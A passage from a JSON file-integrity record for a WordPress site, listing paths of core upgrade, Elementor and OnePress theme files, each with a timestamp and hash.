z\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-admin\\/edit-form-blocks.php\":{\"d\":1547081509,\"h\":\"5b164b0021ae9990d10f7e44effb60be\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-admin\\/post.php\":{\"d\":1547081509,\"h\":\"113f984e8ea915a7e082c82c24270aea\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/wp-admin\\/about.php\":{\"d\":1547081509,\"h\":\"a8e8e05e3edb00d74ad51a75898b6c16\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/license.txt\":{\"d\":1547081516,\"h\":\"40fc2f39d472a1bb52f4ebe59702e0c2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/upgrade\\/wordpress-5.0.3-partial-2-qM4Qki\\/wordpress\\/readme.html\":{\"d\":1547081509,\"h\":\"55d27f1f9f7f79fa2593a5b32907ee44\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/index.php\":{\"d\":1326033072,\"h\":\"67442c5615eba73d105c0715c6620850\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/uploads\\/elementor\\/css\\/post-1486.css\":{\"d\":1545682647,\"h\":\"6a69fc2013593d64cf64069d9f58a2e2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/uploads\\/elementor\\/css\\/post-1447.css\":{\"d\":1546918847,\"h\":\"d01b9d6a367d98fc724eae80ebae7256\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/uploads\\/elementor\\/css\\/post-1480.css\":{\"d\":1545721884,\"h\":\"4c62a02baac0a083e6b35fb1773ad377\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/uploads\\/elementor\\/css\\/post-1555.css\":{\"d\":1546498076,\"h\":\"218c9c18a5be9ce64d396a4b69991c58\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/uploads\\/elementor\\/css\\/post-1481.css\":{\"d\":1546568108,\"h\":\"3e8bd38d99c8144cce2d8e4466c24fd7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/uploads\\/elementor\\/css\\/global.css\":{\"d\":1545639227,\"h\":\"8831acda318b14a90d5eeceb6f27456d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/uploads\\/elementor\\/css\\/post-1449.css\":{\"d\":1545992977,\"h\":\"937fbac05f55841b0e07d2fe08c27c2f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/uploads\\/elementor\\/css\\/post-1448.css\":{\"d\":1546590279,\"h\":\"a1e748d80b9b7bfc05a7d573ad34cd5c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/uploads\\/elementor\\/css\\/post-2580.css\":{\"d\":1545639231,\"h\":\"c2ae5d8b57361a9d280fe5a863dd4edb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/uploads\\/elementor\\/css\\/post-1445.css\":{\"d\":1546587133,\"h\":\"ab16dbcbc53127cf4b0bcdbf568d9968\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/onepress-dummy-data.xml\":{\"d\":1544496208,\"h\":\"a5482189d8eafa2401aad3c96f56755b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/onepress-plus-config.json\":{\"d\":1544491389,\"h\":\"9d31659e174d5db508fa90a983e59c29\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/onepress-plus-dummy-data.xml\":{\"d\":1544491389,\"h\":\"a02d19786c76c4e2d317b5a6b0a162e7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/onepress-config.json\":{\"d\":1544496208,\"h\":\"e3d865e7a9ab2cc5d6f92e0e65ecda9e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/template-parts\\/content-list.php\":{\"d\":1545792530,\"h\":\"4cf102da8f9a54baa93bf7422218a8bd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/template-parts\\/content-single.php\":{\"d\":1545792530,\"h\":\"d5d7f05d7d6ff94a5d6c8c9552d4fb29\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/template-parts\\/content-page.php\":{\"d\":1545792530,\"h\":\"e42a23dc6589b87e9ee05f291bc0c546\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/template-parts\\/content-none.php\":{\"d\":1545792530,\"h\":\"0395c22e1abbc5da82700be5fdfdbad4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/template-parts\\/content-search.php\":{\"d\":1545792530,\"h\":\"081806370d5d3f4ab485cc49619a5ec2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/template-parts\\/content.php\":{\"d\":1545792530,\"h\":\"2d0b00a54b49540a89839820f57f8fe0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/css\\/bootstrap.min.css\":{\"d\":1545792530,\"h\":\"fbc5f82aac64915adbc338e843564701\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/css\\/lg-fb-comment-box.min.css\":{\"d\":1545792530,\"h\":\"f216c9f755ca3131d5d8abff3eee5193\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/css\\/animate.css\":{\"d\":1545792530,\"h\":\"76b8fb08c4e5b46967f78860f15284bc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/css\\/lg-transitions.css\":{\"d\":1545792530,\"h\":\"82dd98549f71a2842fe564a8d23ffaec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/css\\/lightgallery.css\":{\"d\":1545792530,\"h\":\"276c525e0fed9c5df9e9958cf2d5fbd5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/css\\/font-awesome.css\":{\"d\":1545792530,\"h\":\"6a2c005de2c4f7ef6530c22be42f868d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/css\\/animate.min.css\":{\"d\":1545792530,\"h\":\"7c48fe3a3414989cff456b256c0fd9e3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/css\\/customizer.css\":{\"d\":1545792530,\"h\":\"3d6a63cfa07153da9a58f61124b52ad5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/css\\/bootstrap.css\":{\"d\":1545792530,\"h\":\"5fcef60414e43308beb06c41c2fc96de\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/css\\/font-awesome.min.css\":{\"d\":1545792530,\"h\":\"085a00c9cc68a56b8d91628d54287834\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/css\\/lg-transitions.min.css\":{\"d\":1545792530,\"h\":\"756f824f705b1180f57412c26ef47607\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/css\\/lg-fb-comment-box.css\":{\"d\":1545792530,\"h\":\"545b97b0ae870e6a0721940897257166\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/css\\/admin.css\":{\"d\":1545792530,\"h\":\"272b298a7fb5208c8c05e079ff6424dc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/sass\\/style.scss\":{\"d\":1545792530,\"h\":\"de0801150599fdcd6c6bb48bc1966073\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/sass\\/_structure.scss\":{\"d\":1545792530,\"h\":\"456b5550f2b40c482c38242affc12898\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/sass\\/_document.scss\":{\"d\":1545792530,\"h\":\"8ed5c09e339acf3788744c08b70af72b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/sass\\/editor.scss\":{\"d\":1545792530,\"h\":\"f0794da512b3dcfb5d5552fe57440a55\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/sass\\/_variables.scss\":{\"d\":1545792530,\"h\":\"2d203db639c2b50d7d70a0b2d595d87a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/sass\\/_sections.scss\":{\"d\":1545792530,\"h\":\"0d94d9304a8fa2a664aeac8fdad5dbaf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/sass\\/_reset.scss\":{\"d\":1545792530,\"h\":\"4b6c9f236ec5e397864302107743cdb3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/sass\\/_layout.scss\":{\"d\":1545792530,\"h\":\"ff9b1b210cbd586d3bfe65e336e01462\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/sass\\/_gutenberg.scss\":{\"d\":1545792530,\"h\":\"36d76f57a0907b241d079b3015383ef1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/sass\\/_elements.scss\":{\"d\":1545792530,\"h\":\"47f1098bf23ccd9b8ec357d2b3d64b25\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/sass\\/_contents.scss\":{\"d\":1545792530,\"h\":\"9abb5119ddf27cb496b799158346efba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/sass\\/_widgets.scss\":{\"d\":1545792530,\"h\":\"735c436c0d76a42bce9a8b75cd98df86\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/sass\\/_bully.scss\":{\"d\":1545792530,\"h\":\"8c276457a4d18ad934fd56416fc94566\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/sass\\/_external_plugins.scss\":{\"d\":1545792530,\"h\":\"87b543979700f9e33e9fa12d9c77c33f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/js\\/jquery.justifiedGallery.js\":{\"d\":1545792530,\"h\":\"7227699d3001fe2dbb0229357b52e8d4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/js\\/jquery.backstretch.js\":{\"d\":1545792530,\"h\":\"1c8c1d3eeed35d91c9da449af6cbffbc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/js\\/imagesloaded.js\":{\"d\":1545792530,\"h\":\"8e18980f07e2e4a71a3db18aa72f84c5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/js\\/owl.carousel.js\":{\"d\":1545792530,\"h\":\"30fc57f177ae20a09246613d7d7a7e47\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/js\\/isotope.pkgd.min.js\":{\"d\":1545792530,\"h\":\"c09fe8844fcbb765121f3805619aadd7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/js\\/wow.js\":{\"d\":1545792530,\"h\":\"78fa1665e87f8c0ae2561cd1c8a19fd2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/js\\/jquery.fitvids.js\":{\"d\":1545792530,\"h\":\"3144c4aaf1519b4c634989e65c5dd209\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/js\\/customizer.js\":{\"d\":1545792530,\"h\":\"c993509e381302fb9ef1c39a9b7b6f14\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/js\\/bootstrap.min.js\":{\"d\":1545792530,\"h\":\"583cfe88e1fa0e182d10399f45d21283\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/js\\/owl.carousel.min.js\":{\"d\":1545792530,\"h\":\"2f81c8e306ab721a8bc7037b418cb403\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/js\\/customizer-liveview.js\":{\"d\":1545792530,\"h\":\"ee1dccb80b5b30cf2776dd8494b6d3a4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/js\\/jquery.bully.js\":{\"d\":1545792530,\"h\":\"5934f838c1bd7c60a764d407e0cb3072\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/js\\/theme.js\":{\"d\":1545792530,\"h\":\"a6bf09a8bc328aae5210776b60777997\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/js\\/bootstrap.js\":{\"d\":1545792530,\"h\":\"9cefa7caefea7ca0890aa47703ded06d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/js\\/isotope.pkgd.js\":{\"d\":1545792530,\"h\":\"e4ae7aca757b428f930a11076d82ad39\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/js\\/jquery.waypoints.js\":{\"d\":1545792530,\"h\":\"e8d6879c8ce06f7dbae5f389843f3788\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/js\\/morphext.js\":{\"d\":1545792530,\"h\":\"c615b01da49ce9332ce87cc3f521a9b1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/js\\/lightgallery.js\":{\"d\":1545792530,\"h\":\"502a96dd3d3c1f7ada6b1076049d4353\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/js\\/plugins.js\":{\"d\":1545792530,\"h\":\"bce894e14194b3d52955e20686c2e8eb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/js\\/jquery.justifiedGallery.min.js\":{\"d\":1545792530,\"h\":\"2b3d40ed1cbe1cb2de2eb6a191e3ae95\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/js\\/tether.js\":{\"d\":1545792530,\"h\":\"8c13020245c502eb8cd8278a3a30e879\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/fonts\\/lg.eot\":{\"d\":1545792530,\"h\":\"c853a32787dade9fa720183374ee452a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/fonts\\/fontawesome-webfont.woff\":{\"d\":1545792530,\"h\":\"fee66e712a8a08eef5805a46892932ad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/fonts\\/lg.woff\":{\"d\":1545792530,\"h\":\"47aae6af0370e6acb0805e359db12687\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/fonts\\/fontawesome-webfont.eot\":{\"d\":1545792530,\"h\":\"674f50d287a8c48dc19ba404d20fe713\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/fonts\\/fontawesome-webfont.ttf\":{\"d\":1545792530,\"h\":\"b06871f281fee6b241d60582ae9369b9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/fonts\\/FontAwesome.otf\":{\"d\":1545792530,\"h\":\"0d2717cd5d853e5c765ca032dfd41a4d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/fonts\\/lg.ttf\":{\"d\":1545792530,\"h\":\"54d58ad47ad02fc0f30c926645110b60\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/assets\\/fonts\\/fontawesome-webfont.woff2\":{\"d\":1545792530,\"h\":\"af7ae505a9eed503f8b8e6982036873e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/languages\\/onepress.pot\":{\"d\":1545792532,\"h\":\"268c1d384ab2a4d47127483dbf9679a5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/languages\\/readme.txt\":{\"d\":1545792532,\"h\":\"5625f0e602a8570a246022979d2f6391\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/admin\\/class-editor.php\":{\"d\":1545792532,\"h\":\"79d84dce7c62db82699ca528b1a9325e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/admin\\/dashboard.php\":{\"d\":1545792532,\"h\":\"13b9eaafbdd6ae036ba39ed6e2fa68ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-controls\\/control-editor.php\":{\"d\":1545792532,\"h\":\"b7efcf94ee17897f4ce3bca0b61cf70e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-controls\\/control-theme-support.php\":{\"d\":1545792532,\"h\":\"99c70c042eedeced45ed4de34e1e131c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-controls\\/control-category.php\":{\"d\":1545792532,\"h\":\"13b81b3f5e596861df599bfc97dc478b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-controls\\/control-custom-textarea.php\":{\"d\":1545792532,\"h\":\"a7e3b5313fc8499f2ff5a9c8a7fd820c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-controls\\/control-color-alpha.php\":{\"d\":1545792532,\"h\":\"b60607f5f5c37bfd9518617ea20bc56d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-controls\\/section-plus.php\":{\"d\":1545792532,\"h\":\"b684f092d57037b08bd4af1b6689cfcc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-controls\\/control-misc.php\":{\"d\":1545792532,\"h\":\"38a4e890b696156e2d2a2473d5e928ec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-controls\\/control-pages.php\":{\"d\":1545792532,\"h\":\"b39a2acecdeb9953fe9a94d394d93298\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-controls\\/control-repeater.php\":{\"d\":1545792532,\"h\":\"49f0dfe956c6e4638bb0f52ec6cfad22\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-configs\\/options-header.php\":{\"d\":1545792532,\"h\":\"2c38715b2816c762dbdb0123e04949ae\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-configs\\/section-contact.php\":{\"d\":1545792532,\"h\":\"a754a1b21ebe93fe622e78689bc2c966\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-configs\\/options-footer.php\":{\"d\":1545792532,\"h\":\"1cb694699e0a3d5d44928e9680b9c055\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-configs\\/options-page.php\":{\"d\":1545792532,\"h\":\"ef34e986217bc0265ff4c68ab51a9f53\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-configs\\/options-global.php\":{\"d\":1545792532,\"h\":\"e600f8ef80eaab7f3936320eea7f90bc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-configs\\/options.php\":{\"d\":1545792532,\"h\":\"f8e3a13761dc269982db40e47b563777\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-configs\\/options-blog-posts.php\":{\"d\":1545792532,\"h\":\"1c3af6a93f1f3aefd734c27beac60b1a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-configs\\/section-hero.php\":{\"d\":1545792532,\"h\":\"1836847fe82f0d469b6d6a4134ed0d5e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-configs\\/section-videolightbox.php\":{\"d\":1545792532,\"h\":\"c53d1772d09cf0a96129fc7495c00403\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-configs\\/options-single.php\":{\"d\":1545792532,\"h\":\"5867e83121e7676384fd6d210b1b06a8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-configs\\/section-news.php\":{\"d\":1545792532,\"h\":\"a2a69ee3886536a850d2a07509636d60\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-configs\\/section-upsell.php\":{\"d\":1545792532,\"h\":\"0cd4fa9574a1fbb5c278916d042bd04f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-configs\\/section-gallery.php\":{\"d\":1545792532,\"h\":\"e0f74c07ae751f4a200e074df0ea7304\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-configs\\/site-identity.php\":{\"d\":1545792532,\"h\":\"2affa2cc8c00452943d501fca8e67c34\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-configs\\/section-services.php\":{\"d\":1545792532,\"h\":\"90ad6b86dab9eca470ec4a9564a0f264\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-configs\\/options-navigation.php\":{\"d\":1545792532,\"h\":\"e8e08c0149e95f4df2c7d72ffde877ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-configs\\/section-about.php\":{\"d\":1545792532,\"h\":\"e97a2a9687fcd59ed5cdde16dcc1c927\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-configs\\/section-counter.php\":{\"d\":1545792532,\"h\":\"7d279ca690d21d2923440b4219b2191e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-configs\\/options-sections-navigation.php\":{\"d\":1545792532,\"h\":\"efef09972615cf66ab55c76543447b0e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-configs\\/section-features.php\":{\"d\":1545792532,\"h\":\"f82a171952e5199d7ba6dc2c8b53c5ac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-configs\\/section-team.php\":{\"d\":1545792532,\"h\":\"05b97ca55ad46ee2e65305850010f757\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customize-configs\\/options-colors.php\":{\"d\":1545792532,\"h\":\"c23ecb5fa6ae4456fb9150a9277bf9dc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customizer-controls.php\":{\"d\":1545792532,\"h\":\"6571a452741000fa4ca318c9206200f3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/sanitize.php\":{\"d\":1545792532,\"h\":\"701c76199704b9fc6725995bd8ff109f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customizer.php\":{\"d\":1545792532,\"h\":\"878aea63ff6f4cf03a4e712940253855\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/class-sections-navigation.php\":{\"d\":1545792532,\"h\":\"c22887cfddb53886bf7c7977b9c4fc0b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/extras.php\":{\"d\":1545792532,\"h\":\"d861c42df8d836529f2eed9d6ad35996\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/customizer-selective-refresh.php\":{\"d\":1545792532,\"h\":\"175caf836acb06e46f090a305198f12c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/class-config.php\":{\"d\":1545792532,\"h\":\"27498a3799785ce511aae7222a3853c4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/template-tags.php\":{\"d\":1545792532,\"h\":\"c485912913d0843e857c283ae2f36832\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/inc\\/metabox.php\":{\"d\":1545792532,\"h\":\"bb396cf8808a7521074b05486f84b9f9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/section-parts\\/section-contact.php\":{\"d\":1545792532,\"h\":\"c634f114081163ad2bd9f7bfdd7fb8c2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/section-parts\\/section-hero.php\":{\"d\":1545792532,\"h\":\"fdaa07a9e2af3c80acc6b4b913a0fc42\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/section-parts\\/section-videolightbox.php\":{\"d\":1545792532,\"h\":\"c31e316aa13f101a5c00a33b64df1407\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/section-parts\\/section-news.php\":{\"d\":1545792532,\"h\":\"37dc566797915c17202528ae2cb760f7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/section-parts\\/section-gallery.php\":{\"d\":1545792532,\"h\":\"79d75e94e881175aa3e676d76c0f7308\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/section-parts\\/section-services.php\":{\"d\":1545792532,\"h\":\"5e084a2f9d37c255d6137141f281f821\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/section-parts\\/section-about.php\":{\"d\":1545792532,\"h\":\"8a765448a503c67157943ebf66ac4dd6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/themes\\/onepress\\/section-parts\\/section-counter.php\":{\"d\":1545792532,\"h\":\"95a22f10dbaff051dd6a3f2ccb83ab30\"},\"\\/home\\/norfai